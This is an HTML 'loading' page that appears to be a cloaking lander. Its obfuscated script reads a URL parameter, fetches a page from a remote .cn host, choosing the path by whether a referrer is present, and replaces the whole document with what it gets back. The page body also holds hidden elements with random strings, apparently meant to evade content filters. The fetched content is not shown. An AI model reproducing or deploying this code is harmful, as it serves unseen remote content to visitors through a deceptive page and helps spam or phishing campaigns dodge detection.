<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pHf2Gu80nMH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pHf2Gu80nMH .fLGURB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pHf2Gu80nMH .content {
            line-height: 50px;
            text-align: center
        }

        .pHf2Gu80nMH .img {
            width: 100%
        }

        .pHf2Gu80nMH .H5UdHZO {
            text-align: center
        }

        .pHf2Gu80nMH .H5UdHZO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pHf2Gu80nMH .H5UdHZO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pHf2Gu80nMH .H5UdHZO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pHf2Gu80nMH .H5UdHZO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pHf2Gu80nMH .H5UdHZO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pHf2Gu80nMH .H5UdHZO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pHf2Gu80nMH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OUaW61QZiPj0V(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ou9eN = OUaW61QZiPj0V('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ou9eN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ou9eN +".html?a=share";
		}
		
        XtlEvZIR=url+"#"+new Date().getTime();
        XtlEvZIR && function() {
            $.get(XtlEvZIR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>KkFskDtlCyilRG8SENwX0PPmd4JCMFQm10eh4o35jafAEKkj0QV2wYAFiVPSKjUkFS</p>
<h1 style='display:none' >ZVEsiEyZ7nbRWVEGogufhQFMREKF2VXbsyzWE3bcgbKl3X1N6mZDOAYVVRHmcPEbvVqJ</h1>
<span style='display:none'>iFKXJ3CQv6xHzsJmRA14m182CqpfcTlXldWYml7cejfPW8Mid9rkiPpWXxLvOvA1ipL1q</span>
<li style='display:none' >E374pY5POF8SED6D8hR2Exu6CL0xb2k</li>
<li style='display:none' >E374pY5POF8SED6D8hR2Exu6CL0xb2k</li>
<li style='display:none' >E374pY5POF8SED6D8hR2Exu6CL0xb2k</li>
<img  src='' style='display:none'>
<div style='display:none'>vNXASIH1etzBT6H3KHRBg0RcCvcQN0mkBNNk4eunJXGg1C7a</div>
<span style='display:none'>iFKXJ3CQv6xHzsJmRA14m182CqpfcTlXldWYml7cejfPW8Mid9rkiPpWXxLvOvA1ipL1q</span><div class="pHf2Gu80nMH">
    <div class="fLGURB">
        <div class="H5UdHZO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >hTUcKcjwXHtmPOqsHlraZaMdbIIJHgsLF</ul>
<ul style='display:none' >hTUcKcjwXHtmPOqsHlraZaMdbIIJHgsLF</ul>
<span style='display:none'>EWJtIAprrSfjOjclxIB0VAnuwkbX0hHi8dIJivlb43EXaM1mTemlC7KRVOq69V6Y2pw</span>
<li style='display:none' >NiHkL7940NIwXEJm03lau235YLx53I7QarAZalPAXQAprqFRVjwSAR7LQHjNd665NQJv</li></body>
</html>